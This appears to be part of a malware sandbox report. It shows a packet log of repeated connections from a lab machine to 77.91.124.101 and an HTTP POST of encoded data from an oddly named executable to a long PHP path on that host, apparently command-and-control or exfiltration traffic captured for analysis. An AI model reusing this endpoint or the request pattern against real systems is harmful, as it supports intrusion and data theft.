Nov 21, 2023 04:48:44.068773985 CET	49830	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.069171906 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.269365072 CET	80	49830	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.269427061 CET	49830	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.269639969 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.269714117 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.269886017 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.469590902 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.469629049 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.470208883 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.671385050 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.671408892 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.675368071 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:44.728840113 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.806813002 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:44.807379961 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.005835056 CET	80	49832	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.006036997 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.006190062 CET	80	49831	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.006195068 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.006253958 CET	49831	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.151293039 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.151808977 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.203874111 CET	80	49832	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.203978062 CET	80	49832	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.204041004 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.273627043 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.353135109 CET	80	49833	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.353271008 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.353457928 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.355977058 CET	80	49832	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.355990887 CET	80	49832	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.356028080 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.356061935 CET	49832	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.470093012 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.470176935 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.470352888 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.552839041 CET	80	49833	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.553359032 CET	80	49833	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.553590059 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.666929960 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.667021990 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.667335033 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.751174927 CET	80	49833	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.755808115 CET	80	49833	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.806942940 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.864116907 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.864135027 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.868627071 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:45.916309118 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.993278980 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.993309021 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:45.993840933 CET	49835	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.190121889 CET	80	49834	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.190247059 CET	49834	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.191040993 CET	80	49833	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.191102982 CET	49833	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.192542076 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.192651987 CET	49835	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.192867041 CET	49835	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.391829967 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.391906977 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.392203093 CET	49835	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.591191053 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.591234922 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.595650911 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.650691986 CET	49835	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.710149050 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.907819986 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:46.907927036 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:46.908144951 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.105751038 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.105767965 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.105983019 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.303853989 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.303869963 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.308711052 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.353904009 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.428858995 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.429299116 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.627346992 CET	80	49836	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.627504110 CET	49836	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.628783941 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.628895998 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.629125118 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:47.828666925 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.828713894 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:47.828972101 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.028744936 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.028794050 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.033458948 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.088208914 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.149730921 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.150338888 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.348126888 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.348203897 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.348392010 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.351250887 CET	80	49837	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.351372957 CET	49837	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.545351028 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.545490980 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.545708895 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.742820978 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.742914915 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.747749090 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:48.791343927 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.867209911 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:48.867625952 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.064276934 CET	80	49838	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.064343929 CET	49838	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.065114975 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.065200090 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.065499067 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.267179966 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.267235994 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.267549038 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.465248108 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.465261936 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.470273018 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:49.525739908 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.859536886 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:49.860080004 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:50.060401917 CET	80	49839	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:50.060468912 CET	49839	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:50.064697981 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:50.064770937 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:50.064968109 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:50.263155937 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:50.263237000 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:50.307013035 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.500138998 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.501117945 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.501719952 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.600766897 CET	80	49835	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.600842953 CET	49835	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.632555962 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.697412014 CET	80	49841	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.697598934 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.697638035 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.697676897 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.698138952 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.702452898 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.702497005 CET	80	49840	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.702558041 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.702594995 CET	49840	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.831227064 CET	80	49842	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.831480980 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.831931114 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:51.894608021 CET	80	49841	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.894644976 CET	80	49841	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:51.895076990 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.030450106 CET	80	49842	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.030527115 CET	80	49842	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.031117916 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.091532946 CET	80	49841	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.096456051 CET	80	49841	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.150779963 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.229856014 CET	80	49842	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.234703064 CET	80	49842	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.275757074 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.351830006 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.351938963 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.352638960 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.552184105 CET	80	49841	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.552319050 CET	49841	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.554239988 CET	80	49842	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.554258108 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.554312944 CET	49842	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.554354906 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.554563046 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.759437084 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.759457111 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.759687901 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:52.958286047 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.958298922 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:52.963704109 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.010123014 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.091126919 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.091686010 CET	49844	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.289022923 CET	80	49843	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.289047956 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.289125919 CET	49843	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.289166927 CET	49844	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.289393902 CET	49844	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.486849070 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.486891031 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.487193108 CET	49844	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.684886932 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.684906960 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.689637899 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:53.744477987 CET	49844	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:53.804989100 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.001570940 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.001748085 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.002024889 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.198425055 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.198462009 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.198731899 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.395390987 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.395432949 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.400331020 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.447626114 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.531034946 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.531656027 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.731539011 CET	80	49845	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.731690884 CET	49845	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.733141899 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.733237982 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.733474016 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:54.930892944 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.930938959 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:54.931238890 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.128897905 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.128915071 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.134145021 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.181966066 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.255959988 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.256391048 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.455446959 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.455835104 CET	80	49846	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.456007957 CET	49846	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.457412004 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.457685947 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.654119968 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.654196978 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.654433966 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.850905895 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.850987911 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.856467009 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:55.900782108 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.978568077 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:55.979051113 CET	49848	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:56.191752911 CET	80	49847	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:56.191863060 CET	49847	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:56.192356110 CET	80	49848	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:56.192444086 CET	49848	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:56.192643881 CET	49848	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:56.390408993 CET	80	49848	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:56.390491009 CET	80	49848	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:56.431992054 CET	49848	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:57.889027119 CET	49848	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:58.087018013 CET	80	49848	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:58.087033987 CET	80	49848	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:58.091731071 CET	80	49848	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:58.135124922 CET	49848	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:48:58.694375038 CET	80	49844	77.91.124.101	192.168.2.5
Nov 21, 2023 04:48:58.695301056 CET	49844	80	192.168.2.5	77.91.124.101

HTTP Request Dependency Graph

77.91.124.101

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	77.91.124.101	80	192.168.2.5	49712	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:24.543304920 CET	139	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:24.740185022 CET	139	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:24.741302967 CET	140	OUT	Data Raw: 00 0b 04 0c 03 0d 01 07 05 06 02 01 02 03 01 01 00 05 05 0e 02 07 03 0d 00 52 0f 00 03 0f 01 03 0f 02 04 09 01 07 03 05 0b 07 05 04 06 07 04 01 05 05 0c 0e 0f 53 05 52 01 02 04 56 04 55 05 0f 00 04 0f 5c 07 04 01 08 0c 50 0c 54 0a 0d 0f 00 04 04 Data Ascii: RSRVU\PTRQU\L~hNPvqv]aKt\|f_`RxM`c_llcHxYa[hSwQwwZiO~V@xSn}Le
Nov 21, 2023 04:47:25.036397934 CET	140	IN	Data Raw: 64 79 0e 7d 59 7a 63 71 5b 46 5b 69 00 67 41 53 75 40 09 63 04 5e 46 6a 04 7e 43 56 64 06 09 55 5c 55 77 6a 60 03 5c 71 5c 57 5f 6c 58 01 44 68 62 06 41 69 6b 7c 4a 79 5e 56 5f 5a 06 70 43 51 61 5c 40 51 58 01 59 54 01 0c 04 57 64 0c 59 54 57 60 Data Ascii: dy}Yzcq[F[igASu@c^Fj~CVdU\Uwj`\q\W_lXDhbAik\|Jy^V_ZpCQa\@QXYTWdYTW`uUg]\|]X_`blZzp]ia@Z}c^RoTkMVrXLboaUwEcg~}^bPUAofzBqZR_ZwE]bSISXD`njE\yoSkkypRh}]hDxkA\|YW_P{J]d]FRZKQVTaejqe^}]xA\|QN~NtzZ@]odEUqIk^FkdH
Nov 21, 2023 04:47:25.036421061 CET	141	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:24 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1340 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7d 5d 6c 54 68 5b 78 72 55 5c 7c 61 5a 5f 69 77 78 50 7f 63 69 4f 6d 4d 68 01 7d 72 52 48 63 63 79 4f 79 71 69 49 75 5f 60 00 7d 4b 78 01 55 4b 71 0c 76 72 5e 5b 7c 71 79 05 7c 49 5f 50 7b 76 7c 0a 6a 60 6b 04 61 5c 6d 4e 77 62 6e 5c 7c 5f 76 03 7d 55 60 40 7e 74 7b 4b 76 76 7b 06 7c 5c 54 5c 7c 73 72 5f 78 67 6b 5f 7b 01 70 4d 6f 6d 7c 5d 6d 62 74 05 7a 63 5c 41 7d 73 77 5f 6f 59 6f 59 69 5c 77 03 77 71 60 02 7a 51 41 5b 7c 67 77 53 7f 07 61 4e 76 7c 7c 41 7b 52 56 05 60 60 5c 40 7a 71 6d 05 7e 7f 7a 04 7b 4f 65 5b 77 60 67 4b 75 5f 67 5c 74 5f 76 50 7e 5d 79 5f 77 62 6d 01 76 66 74 09 68 55 75 01 77 6f 70 04 7f 60 7c 02 78 6f 78 5a 7a 60 66 03 6b 6d 6b 51 74 77 6f 5e 7e 61 72 09 7d 6d 73 08 6f 53 76 41 69 61 7d 07 7b 5d 46 51 68 6f 68 08 7f 63 7b 54 7d 59 7d 59 7b 7e 68 59 6c 71 7f 5b 6b 71 7f 07 7d 77 7c 50 7f 5e 57 0c 6e 73 5a 4f 6a 5c 70 01 74 63 71 51 7b 5c 79 4b 76 58 60 02 7e 48 78 04 7e 66 5f 40 77 62 6b 02 7d 62 79 42 7f 77 50 08 79 66 68 42 7d 73 7f 00 75 5c 5f 07 76 61 5b 4a 7c 71 58 01 7f 6c 74 0b 7f 77 67 4b 76 5f 73 04 7b 4c 7d 48 7d 4e 6d 06 7b 59 5a 07 78 59 60 01 78 7d 63 01 78 62 64 01 7b 5d 7e 04 7f 5e 74 4b 78 67 78 49 7d 72 73 05 75 61 7c 49 7e 52 7f 07 7f 59 70 0a 7f 61 5f 4e 76 7c 70 02 7a 7c 64 00 77 4e 62 0c 7b 71 5f 00 7d 42 6a 41 7a 61 76 48 76 4d 55 4b 75 5f 70 04 74 71 50 0a 7f 4e 50 40 77 62 71 4f 75 75 74 42 7f 6c 75 06 74 42 5e 42 7c 4d 70 44 79 7c 73 00 7a 70 72 44 7f 7d 5e 41 77 77 74 4e 7f 62 76 40 7d 7d 77 0d 78 53 5c 04 7e 72 57 07 7c 60 68 09 7c 42 5a 08 7d 4e 7c 08 7d 59 66 01 7b 6d 67 00 7b 5c 78 46 7c 5f 7b 00 7d 49 63 0c 7c 5e 79 0c 7a 63 78 00 7e 72 52 02 74 4d 7d 0c 79 61 7d 06 77 66 7c 4a 7c 76 68 02 7e 48 79 0c 74 4c 59 03 7c 5c 53 01 7c 67 72 0b 7b 76 74 40 7d 63 77 00 75 72 5f 4c 74 61 61 02 7c 4f 54 00 7e 6c 6c 40 7e 49 55 06 76 4f 77 04 7b 5c 53 02 7d 70 75 44 7b 59 60 4c 78 59 68 4d 79 6d 77 4b 79 62 52 01 7a 63 7e 03 7b 5d 4e 5a 78 59 6f 58 7d 72 60 5a 77 71 77 58 6a 0a 73 00 7d 64 63 51 7c 61 6d 0c 61 52 73 5d 6f 6f 60 04 60 60 54 40 7a 4f 76 5d 69 7c 7a 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 59 76 4d 63 5c 72 59 62 5b 68 0a 7c 42 7a 5f 63 7c 7c 06 7e 63 6b 5a 7b 7c 7c 5b 78 4e 5f 5e 7f 7e 6f 52 74 67 70 02 7e 5b 7a 4f 7a 53 59 51 6f 0b 61 40 69 05 72 06 60 06 77 4c 68 60 5d 4e 62 73 49 54 7a 5a 40 5d 6f 7d 55 49 6f 61 78 03 68 61 63 07 6a 49 6c 55 7c 4e 79 4f 7a 63 6b 59 7d 62 6f 5a 77 73 6a 54 79 5f 5b 00 76 65 64 06 6a 00 64 5e 7f 5c 4b 51 63 04 64 45 51 71 48 04 68 01 5f 4c 6e 01 73 54 50 6f 64 5c 5b 05 69 5f 76 5c 71 04 7e 66 07 49 7e 7c 5e 4c 7d 67 55 46 76 5f 73 59 79 75 72 5e 69 63 01 44 54 7b 6f 5a 57 64 0c 53 6f 0b 5e 01 52 65 7c 07 7c 5c 7d 07 6b 06 51 5b 55 5e 63 49 57 75 7f 44 71 58 51 5c 51 0b 74 41 56 64 55 48 50 59 0d 40 62 6f 5d 46 57 0a 05 58 76 5d 7d 7a 50 62 7a 01 50 55 65 4c 51 72 58 58 74 74 7c 5d 62 62 0c 41 5b 7d 61 57 50 63 06 51 5a 5b 6e 5b 59 66 00 4d 60 0a 09 5e 63 6b 70 03 78 5c 70 5a 7a 7b 7c 5c 6f 63 0a 44 50 71 6f 57 58 64 0c 50 53 5b 61 56 52 6e 0f 4d 61 54 71 42 6a 65 79 01 7b 5f 7b 09 6b 0b 6f 40 6a 6c 7f 08 52 60 7e 47 7c 54 56 5f 54 05 73 42 55 62 56 43 51 5f 0f 52 53 07 66 4d 50 7f 73 00 61 04 0c 5a 63 Data Ascii: 